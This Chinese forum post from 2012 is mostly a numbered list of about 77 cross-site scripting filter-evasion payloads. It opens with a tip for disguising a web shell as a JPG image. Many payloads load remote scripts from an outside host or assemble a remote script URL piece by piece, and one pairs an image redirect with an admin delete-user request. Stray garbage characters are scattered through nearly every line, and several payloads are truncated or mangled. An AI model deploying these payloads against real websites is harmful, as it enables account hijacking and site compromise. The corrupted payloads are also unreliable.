跨站图片shell- e7 f: Y% G4 C, |7 W
XSS跨站代码 <script>alert("")</script>0 @* P! @ x- q% z E5 [( `5 b4 s
* c2 [. W4 \! ^: o' D( z" a将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
3 K) ?# V7 O0 Y" o: a- t$ {& e% P, c5 h) Z2 @2 z$ D4 {" j6 [, B
1 T9 ]/ I( X' a/ j: k
# }" A' f) u5 a7 P# T5 Q* T( g
1)普通的XSS JavaScript注入
2 v% L2 \9 ^! `+ T* r& S: N8 Z<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>) G, S. U2 b) g" q3 h
6 m% `7 x" Z" J" H7 v(2)IMG标签XSS使用JavaScript命令
& E9 _. [& c9 u<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>& E2 l. A* [9 W6 h/ s4 A
& ~1 ?0 U( |8 M% K2 L3 M(3)IMG标签无分号无引号5 o/ y. j! r/ B% A( J
<IMG SRC=javascript:alert(‘XSS’)>- `% Z* ~8 W6 Q, i
" `1 }& }. s; T$ y
(4)IMG标签大小写不敏感7 r, z4 d6 F e! {5 Z
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
9 j d/ S( K7 v6 W
' L. {' e5 ~0 J/ [5 I" b7 c# r(5)HTML编码(必须有分号)
. {2 w7 F& W4 A<IMG SRC=javascript:alert(“XSS”)>0 [) ]9 |1 A% T3 @& B0 Y
! ~' ]5 ~' S2 \5 N(6)修正缺陷IMG标签
5 R; q3 n( \3 d6 a& C1 b<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
* I- |* I- Q7 F
9 }9 C, m3 v+ K9 A R% R5 N' A, V2 S(7)formCharCode标签(计算器)- J) w- x$ y. k5 \
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
5 x2 a1 X5 F+ F
4 R0 ?7 T0 z. `(8)UTF-8的Unicode编码(计算器), p7 D& l$ [% U5 S5 R' x2 R+ i, Z
<IMG SRC=jav..省略..S')>
9 `3 y8 D( H- z% r
. J% S4 `* I" h4 [(9)7位的UTF-8的Unicode编码是没有分号的(计算器)4 i6 P, ?1 r w2 C+ J
<IMG SRC=jav..省略..S')>1 p% Z4 ?6 w( P6 I1 `6 w) J6 f
& J3 ]5 A% O( ^9 |0 E/ h
(10)十六进制编码也是没有分号(计算器)6 C! n2 J# j: \! A% n- z
<IMG SRC=java..省略..XSS')>& I# }6 I h$ g6 v+ z. d
, }$ d" b' z, j! x$ e5 q% N(11)嵌入式标签,将Javascript分开0 B m7 O5 D4 c% E8 Q
<IMG SRC=”jav ascript:alert(‘XSS’);”>& @7 _- l: `$ C: N/ t
" e) O* N" x5 E, P1 |9 R! X
(12)嵌入式编码标签,将Javascript分开/ a+ |; D$ @# E; q& w
<IMG SRC=”jav ascript:alert(‘XSS’);”>
' v) l) l+ H0 W* n8 t, w0 q& }) c5 O/ ]
(13)嵌入式换行符
6 [3 s; k3 z9 R, `<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ ?& q) P S8 p9 K1 k0 J' |0 c3 t: p. m9 |2 k2 ]. u& x! p6 m! g
(14)嵌入式回车
# |& K% Z8 n4 i5 \4 N3 j<IMG SRC=”jav ascript:alert(‘XSS’);”>0 G& N ~% v# O
% H4 S! _1 h* ~9 Z& K$ W" m
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
2 s/ `" F4 h! T/ R! w<IMG SRC=”javascript:alert(‘XSS‘)”>
# j2 n% O- m3 B7 f3 u, D- m) M
9 J ~7 d4 |3 H9 G% D/ U& J(16)解决限制字符(要求同页面)
: ], t' Q4 f5 F9 M<script>z=’document.’</script>
+ Z; N4 H/ j) y) ~2 A, t<script>z=z+’write(“‘</script>
3 s. o6 A: c) a( {) z5 b1 D4 |<script>z=z+’<script’</script>
! \/ U5 T. H; e5 q' x<script>z=z+’ src=ht’</script>
8 y( T5 e9 q! ?6 D' U" t6 Y# W<script>z=z+’tp://ww’</script>5 u) \9 m! [) r9 h6 f
<script>z=z+’w.shell’</script>
5 ^( p3 O& ]6 }<script>z=z+’.net/1.’</script>5 E0 Z; n: [% ]4 E4 ]$ {& ]$ h
<script>z=z+’js></sc’</script># V7 o4 w: q) \
<script>z=z+’ript>”)’</script>3 b1 r1 }, } v/ d: k% K( a! `0 l
<script>eval_r(z)</script>
- G2 W. N2 {! g4 Y9 U' [- V t* w' D, T- L5 m, _; h
(17)空字符
! W# G8 x4 V- I5 ~ h5 C' xperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out1 ~3 }# ], y, v8 w: |+ i1 H
2 J, O6 b% T/ e(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用 u0 z7 A6 \0 R* j$ G7 L
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out j$ E% E E5 Y
7 U, V' H7 K! h" d; |& F' ?
(19)Spaces和meta前的IMG标签, a, u3 y2 J0 Q6 `2 t) s* F2 b
<IMG SRC=” javascript:alert(‘XSS’);”>
$ K! M+ p: F! l6 u" h" ?
4 u+ e' i& i7 k' ?7 Q' u(20)Non-alpha-non-digit XSS
1 j6 p2 _& |2 U3 k1 L( a<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>2 v: z# s D5 }! w1 q! h' W! \5 e
9 ?: w5 n5 c/ h7 N(21)Non-alpha-non-digit XSS to 2
- D/ J. N5 ]8 F<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
( O" |& n) c6 A7 A+ N* W$ V7 G8 }1 T2 U( v* e: C& S
(22)Non-alpha-non-digit XSS to 3
1 ^: T2 c. L7 P( G$ H<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
# U# @' `6 X w' f( V5 r0 R9 A. ^" d% q* L
(23)双开括号
# P/ h; F. w( n3 K<<SCRIPT>alert(“XSS”);//<</SCRIPT>
7 D; X7 K/ M1 d
7 H/ e7 q' i r" @# R6 z) w: f5 M1 @(24)无结束脚本标记(仅火狐等浏览器)8 X, L' X; C" |& e: B A
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>6 s S8 K& b+ T7 P6 W2 q6 {
. M0 X+ q& S& O) g m2 v* J(25)无结束脚本标记2 r6 n) t( C9 B y$ x3 B
<SCRIPT SRC=//3w.org/XSS/xss.js>
: D& B8 M) f/ |5 y$ R. f
1 y9 j' y3 l" c9 r; c(26)半开的HTML/JavaScript XSS
2 w0 D4 { E! J9 G# K& ~! R) m; x<IMG SRC=”javascript:alert(‘XSS’)”
0 `. A5 x4 n4 \( l
# L4 ^3 }: h, n6 W1 j(27)双开角括号
5 j+ u3 w3 l1 e% s' I/ D5 q* N; Z<iframe src=http://3w.org/XSS.html <2 [3 ?# ?$ j( _8 b( k
h+ s8 X% y( P0 t" U; B(28)无单引号 双引号 分号
. @0 C% t8 i( h7 C6 O* ~0 a1 M<SCRIPT>a=/XSS/
# v% U/ m6 U" W0 `/ A" aalert(a.source)</SCRIPT>) ^6 r6 d* F0 ~0 g2 ]
9 O. G( \: t# ^" e9 W
(29)换码过滤的JavaScript9 _0 m$ q1 j; H1 i& `! o0 K
\”;alert(‘XSS’);/// Q) W) i/ ~9 k2 ]
3 y' M* l. b9 L. W2 _(30)结束Title标签' H }& j% e" ]8 B' J' X
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
: I; \7 n; y* h4 n8 c6 t5 ^& |* O/ U- M0 N# \" [. N
(31)Input Image: P* p3 }2 m/ J r9 i" B* w
<INPUT SRC=”javascript:alert(‘XSS’);”>
* _0 _. ?: B6 e3 d& `+ ?% o5 q+ L; [7 y/ g1 Z
(32)BODY Image
0 i# E- g( N8 \6 [0 u( M<BODY BACKGROUND=”javascript:alert(‘XSS’)”>7 S5 p$ [9 q7 x% _# k+ u( |
! |* [6 W* L# v# _' x7 _% _(33)BODY标签+ F5 p6 M! v) v: z% Q% t
<BODY(‘XSS’)>
" y" {. D' O6 W5 u' l4 c* x( W6 i8 \- L0 C0 S! M' u) H0 E
(34)IMG Dynsrc
! l3 D# t( M: y2 B4 ?# T+ v<IMG DYNSRC=”javascript:alert(‘XSS’)”>
$ R# B4 O1 B1 ~# l* C, S% Z1 W9 N) d$ ?) c/ ^
(35)IMG Lowsrc
& ?4 J4 v$ b5 {' m& h<IMG LOWSRC=”javascript:alert(‘XSS’)”>
: p9 p2 [9 ~4 f+ Y$ A$ u s. r4 L# L# K2 t' B; G
(36)BGSOUND
: R9 h f$ \+ V- \. R<BGSOUND SRC=”javascript:alert(‘XSS’);”>
5 h% [) C8 O7 p$ Y# Y: V1 S7 r1 O. H: D0 b4 R
(37)STYLE sheet
6 Y C, c! R3 |! U# {& b<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>" i+ L, t- A: V0 S: T
, A y1 I5 S% d' v
(38)远程样式表9 m" ?- C5 _/ O- b7 Z7 G& E
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
+ k& L7 ^3 f: n! V, v$ ]: M: [5 g U7 B7 I
(39)List-style-image(列表式)
- A: [8 j8 A1 V/ \<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
- Z( F9 L8 f6 ~- n0 u
5 [& [2 B* e. w% W8 {2 Y/ S(40)IMG VBscript2 x' A- M% Q. r
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
3 G$ B0 W7 k' q' w3 D5 I/ `
( x, W6 }& r: {0 ~5 R(41)META链接url5 b+ K+ g6 @5 \4 @5 E9 r @
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>8 ~, [, @4 t$ @3 Y7 z
! i- X1 C% V: j+ w$ v(42)Iframe4 j$ F8 E# N) o6 U
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>0 E; r. [. b; O1 b3 |/ n
(43)Frame
7 l& O3 O$ X0 R3 t<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
, O; Y7 S4 m# T0 G
6 C! `4 n; W, O4 ](44)Table N' ?" g8 O7 k' s7 u
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
7 [( T4 U# r8 }/ P, Y+ g* J# ^ R2 G) t8 z* C( h
(45)TD0 t1 ~, b7 p! |9 B8 j
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
2 V7 L j+ D, F5 c5 b D: Z/ `: S; _/ a9 y/ D
(46)DIV background-image
& V) j. m# B: n, U) l- x8 @<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! F/ g+ y. Q* u6 ?" g
8 x; _7 f1 i# b' U, r(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)3 C4 K8 l% a3 v" F. t% E# N
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>) f/ s# J6 G8 L* n. ]
* O# i8 v$ r0 Y6 `3 h8 l
(48)DIV expression
2 \" h9 R% i; F4 n% u" N4 H: z<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
. e/ T) y0 a& r! j7 U3 {5 I; r3 l8 k& @! [
(49)STYLE属性分拆表达
: V9 Z" C$ M4 \# ]+ O<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>- K2 V8 z( W# \) T. y4 `
I3 k: x! I1 r(50)匿名STYLE(组成:开角号和一个字母开头)( a% T2 S* L* w
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
/ E* X2 v; r& n; A
/ I/ H- P: r T& P2 w6 C( A" n(51)STYLE background-image' M/ {4 T0 F2 |# T# H+ T
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
% A) H: n+ a, g, C# Y4 C2 s9 T9 d! G" G5 z1 ^7 ~
(52)IMG STYLE方式
j$ `, N8 X" v0 w2 Pexppression(alert(“XSS”))’>
+ u1 a# n1 ~( ]/ k c- j/ v j$ o& }
$ C) i; @' N7 J5 F( U(53)STYLE background6 }; H& }2 S) D
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
( Y# I0 V6 |5 X. k0 }+ V# |* ^
$ n1 d$ m" }8 N N d; Q) p(54)BASE
8 V7 J# {6 Z1 ] J+ y6 W/ _<BASE HREF=”javascript:alert(‘XSS’);//”>
( E5 _/ m0 }3 R6 H' f; e0 C# \% P' `& s
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS( n) _$ A$ S" j0 E- m- I) P
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
3 C0 s' A. D& ~$ }8 S3 {6 ]
' d- N& P7 u; h! J9 e7 \4 R- g(56)在flash中使用ActionScrpt可以混进你XSS的代码, q M5 [( A; O
a=”get”;3 e$ F$ \9 e& P
b=”URL(\”";
& L. s4 d5 f) t+ F6 [) [' V, T& `6 vc=”javascript:”;
5 _+ h: n* z& }/ Ld=”alert(‘XSS’);\”)”;
$ p) r) ?4 Z( j: U" X% Beval_r(a+b+c+d);( `2 |4 n( e( x3 x/ R$ L
0 o" p, Q( O' `+ V(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
2 J2 P+ b' l1 {( g<HTML xmlns:xss>6 u1 |$ x5 a% x1 R+ l
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>7 ?2 n8 ^9 }8 g- _6 F1 P: a; L
<xss:xss>XSS</xss:xss>
+ V/ F1 I* b* K</HTML>
, f; C% s5 d0 k5 x( L
9 Q( h* f# M# J* u(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
9 n+ k5 X6 \, \5 }9 `" H* C1 l5 e# M<SCRIPT SRC=””></SCRIPT>5 R: F. }5 y$ [
2 s4 R* \, ], m; H ]
(59)IMG嵌入式命令,可执行任意命令( ^) W8 S8 }, `; T, |8 l) T
<IMG SRC=”http://www.XXX.com/a.php?a=b”>" s" `0 k8 l6 N8 Y$ g3 t6 A
0 V( c4 h" [0 }(60)IMG嵌入式命令(a.jpg在同服务器)
' r1 U& @9 ~8 w" ZRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser% o+ v* A. d$ O7 o/ Q% T/ B: m
* W1 Q% J8 U/ V% A% u(61)绕符号过滤& `# L, `! F5 R" Q
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
4 V* a: `' E- r5 Y& C" X2 D* ~1 H. J
(62)$ K& o6 H' a# y+ }1 U* F
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
9 w! |2 i- [& Q
4 W6 r" N" T% C9 p5 P6 c' p( U: }(63)
7 ~$ f/ [: Y$ d9 ~9 a6 M0 M<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
$ |) @* ?. g6 u% n: j z
9 T& k6 o* G; `; G6 G(64)! M6 Y T! V0 o' G
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
3 b" D$ q$ C4 U' G
% j' ^+ i5 Z; q* r6 Q& `* `+ k9 E(65)( U3 O* E2 z8 d) c5 L4 o
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>/ w6 }4 L9 i R. I5 c
: ?9 s, x( I5 q. q, h" Q6 v: }(66)+ q0 a* v" K! ]4 m4 V# l, X
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>/ D& h: V: r% t( X, D+ m. _
( h D3 f( e. j& @(67)
9 Z' e1 r# b" y2 }, M: N6 X5 c& P<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
! o% W) d: i. z# X6 U* Y: h2 u+ O6 f; E5 h+ y: m$ Y
(68)URL绕行" ?$ X8 U3 S. P. g' @
<A HREF=”http://127.0.0.1/”>XSS</A>1 N+ z* I' W, O, B* C3 L
: _( h; ^ l+ X% g8 o/ s(69)URL编码$ _0 E5 f; L+ `
<A HREF=”http://3w.org”>XSS</A>
* b, m: m9 ]$ V1 g9 Z Q+ c7 l: P( D2 k' b
(70)IP十进制$ e! g0 X0 {5 Y4 `
<A HREF=”http://3232235521″>XSS</A>
+ n S0 p5 }) R$ O2 b
' H) x9 m, Q* |1 t(71)IP十六进制4 A% `2 J4 H0 o
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
6 s" s( x4 U. @
, y. q) a0 p/ }- K1 q(72)IP八进制
) V- I8 m8 T# _) t w8 d<A HREF=”http://0300.0250.0000.0001″>XSS</A>' r6 l8 i( Z. [! c
5 R- E5 G) k( S/ |4 a(73)混合编码( u) ~; Z( F% Y6 f5 D
<A HREF=”h3 @9 R1 m1 g2 Z0 l8 ]$ J( q
tt p://6 6.000146.0×7.147/”">XSS</A># S/ w* @" `; I9 M2 P4 \
( n/ n: X3 V; |9 |/ z
(74)节省[http:]9 ]- T5 z. E) p, H Q5 t- R' h
<A HREF=”//www.google.com/”>XSS</A>
; A, ]$ m$ }0 b+ p$ T6 v/ |
) E# h4 \8 i6 f* r3 v(75)节省[www]
* Z0 q3 b' ?1 |% f<A HREF=”http://google.com/”>XSS</A>
, P7 i) c6 C) Q
@+ l+ h: T) U2 Q( }; K) T! L(76)绝对点绝对DNS7 o2 E6 m8 g2 Y) p, ?& z
<A HREF=”http://www.google.com./”>XSS</A>7 N* l% I. l3 H5 H
# X9 ?# |, s" n+ ? g. r
(77)javascript链接
2 k! O; ?" l3 a* P) G4 s<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>/ o6 q9 J' p$ P7 d
|
发表于 2012-9-13 17:04:56
收藏
支持
反对